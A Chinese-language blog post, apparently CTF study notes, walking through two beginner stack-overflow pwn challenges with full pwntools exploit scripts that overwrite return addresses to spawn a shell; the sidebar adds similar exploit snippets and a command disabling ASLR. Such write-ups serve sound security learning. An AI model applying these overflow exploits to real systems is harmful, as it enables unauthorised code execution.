Pwn学习 (2)

最新推荐文章于 2024-07-07 21:47:19 发布
最新推荐文章于 2024-07-07 21:47:19 发布
阅读量199 收藏
点赞数 1
分类专栏: Pwn 文章标签: 学习 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127520433
版权

1. jarvisoj_level2

checksec

32 位elf ,开启了NX

IDA Pro静态调试

其中数如其名,可渗透的函数,存在栈溢出漏洞。

 

由于不知道为什么,gdb无法调试这个文件,因此采用IDA Pro给的数据计算。

32位elf,因此需要(0x88+0x04)位 字符

Shift + F12 发现了 /bin/sh

 在main函数中发现了 call system,因此可以通过这个获取shell

构造POC

from pwn import *
sh = process ("/root/Desktop/Pwn Subject/level2")

binsh_addr = 0x0804A024
system_addr = 0x0804849E
payload = (b'A'*(0x88+0x4) + p32(system_addr) + p32(binsh_addr))
sh.sendline(payload)
sh.interactive()

成功获取shell并获取了flag.txt中的内容。

2. bjdctf_2020_babystack

checksec

 就开启了NX

IDA Pro静态调试

backdoor函数,估计就是/bin/sh

main函数中存在栈溢出漏洞

使用 -1 可绕过 

 IDA Pro中 buf的大小为10

构造POC

from pwn import *
sh = remote ("node4.buuoj.cn",25024)

system_addr = 0x4006E6
sh.recvuntil(b"your name:")
sh.sendline('-1')
sh.recvuntil(b"name?")
payload = (b'A'*(0x10+0x08) + p64(system_addr))
sh.sendline(payload)
sh.interactive()

其中

 

 这2行代码不可省略,否则会导致POC无法获取shell

成功获取shell并cat flag.txt

晚上的2题,明天再接再厉。 

Red-Leaves
关注
专栏目录
[Jarvis OJ - PWN]——Backdoor
Y_peak的博客
02-17 293
[Jarvis OJ - PWN]——Backdoor 题目地址: https://www.jarvisoj.com/challenges 题目: 额,怎么说呢这个题有点出乎我的意料, 有点晕乎乎的。虽然题目给出了提示: 这是一个有后门的程序,有个参数可以触发该程序执行后门操作,请找到这个参数,并提交其SHA256摘要。(小写) FLAG:PCTF{参数的sha256} 但是还是很晕。 本来想老规矩先checksec一下的 结果,呵呵哒checksec个大头鬼 运行看看, 也不可以, 呜呜呜, 嘤嘤
pwn的五道基础题
lllwky的博客
03-27 7165
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
7.pwn 工具安装和使用
最新发布
2301_80361487的博客
07-07 910
aslr:查看:cat /proc/sys/kernel/randomize_va_space 2表示打开关闭:echo 0>/proc/sys/kernel/randomize_va_space。
[BackdoorCTF 2023] pwn
weixin_52640415的博客
12-22 697
libc2.35 uaf, 格式化字符串o
llvm pwn入门--第四篇(yakagame)
m0_63437215的博客
05-12 151
强网杯yakagame
pwn栈溢出基础笔记
小白垃圾笔记2
03-17 765
压入栈内的数据包括调用参数,返回地址,调用函数的基地址,以及局部变量,其中调用参数以外的数据共同构成了被调用函数(callee)的状态。称之为“栈”是因为发生函数调用的时候,调用函数(caller)的状态保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。函数调用的时候,栈的变化核心任务是将调用函数(caller)的状态保存起来,同时创建被调用函数(callee)的状态。在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态,恢复寄存器的值。
pwn学习历程.pdf
09-30
标题中的“pwn学习历程.pdf”表明该文档是关于学习pwn(利用程序中的漏洞,通常用于CTF(Capture The Flag)比赛中的pwn题目)的详细学习路径和资料汇总。文档的描述中强调了内容的系统性、模块化以及实用性,特别...
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向,旨在研究和学习 Binary Exploitation,CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程中的心得体会和经验。 一、前期...
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习总结(八)—— 堆(持续更新)
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
【二进制漏洞pwn简单分析】
qq_21119415的博客
01-28 434
输入,这里没有限制用户输入典型的栈溢出漏洞,并且传入变量为&S,因此这里需要输入多个字符串,覆盖掉返回地址。第五步:查找敏感函数,在fun函数里面,执行bin/sh,这里要明白汇编命令,push是压栈,即开始位置,它的起始地址是401168。此处双击&s来定位本漏洞最核心位置,main函数的堆栈地址区域,数一数从输入到执行结束一共需要多少个字节,即多少行,十五行。1,打开main函数,查看逻辑和运行时候的文字(此处需要读取汇编语 言)覆盖到后门位置,即backdoor,然后寻找后门的地址,
【CTF】【PWN】orw
m0_50819561的博客
10-09 1398
这是沙盒机制,就是限制你能使用的syscall。 seccomp-tools这个工具能快速地查出你能使用地syscall。 我们能使用的常用的构造攻击链的只有open,read,write。 但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。 有两种方法,一种直接写汇编,一种利用shellcraft构造。 下面是汇编: ...
做的第一道pwn
LL021101的博客
03-20 1295
做题步骤 一、使用Ubuntu,对pwn文件进行扫瞄; file语句主要用来看本文件是多少位的,是不是elf文件——ELF文件详解—初步认识_code&poetry的博客-CSDN博客_elf文件,(该链接详细介绍了elf文件的基本结构),图中显示64-bit,意思是64位的文件 checksec命令是用来查看该文件有哪些保护措施。 NX(DEP):数据执行防护 Canary(FS):栈溢出保护 RELRO(ASLR):(地址随机化) PIE(代码地址随机化)...
pwn 栈题基础
y0un9er
08-18 990
简要得介绍了一下栈题的思路
jarvisOJ Backdoor (pwn)
苗_的博客
02-27 416
后门??学到了....题目说有一个参数可以触发程序进行后门操作,拖进ida看一下: main函数: signed int __cdecl wmain(int a1, int a2) { char v3; // [esp+50h] [ebp-2C8h] char v4; // [esp+E1h] [ebp-237h] char v5; // [esp+E4h] [ebp-234h] ...
1.pwn基础总结
热门推荐
admin的博客
10-03 1万+
Int_overflow # Int_overflow context(log_level='debug', os='Linux', arch='amd64') p = remote("pwn.blackbird.wang", 9501) payload = "2147483648" p.sendlineafter("Input an int ( <0 )\n", payload) p.interactive() ret2text from pwn import * conte.
PWN-学习笔记
小龙在线
08-23 731
原理 危险函数:gets scanf pwndbg Python2 安装 pip install pwntools apt-get update apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3 -m pip install --upgrade pip python3 -m pip install --upgrade git+https://github.com
英飞凌TC264学习PWN
10-18
好的,关于英飞凌TC264学习PWN,我可以给你一些指导。 首先,PWN是指利用程序漏洞进行攻击的技术,通常用于渗透测试和漏洞挖掘。而英飞凌TC264是一款基于ARM Cortex-M4内核的微控制器,它的安全性取决于程序的编写质量和漏洞挖掘者的技术水平。 如果你想学习PWN技术,可以从以下几个方面入手: 1. 学习汇编语言和C语言编程基础,了解程序运行原理和常见漏洞类型; 2. 学习逆向工程技术,掌握反汇编、调试等工具的使用; 3. 学习常见的漏洞挖掘技术,如栈溢出、堆溢出、格式化字符串漏洞等; 4. 实践PWN攻击,可以使用一些CTF平台上的题目进行练习。 希望这些指导对你有所帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值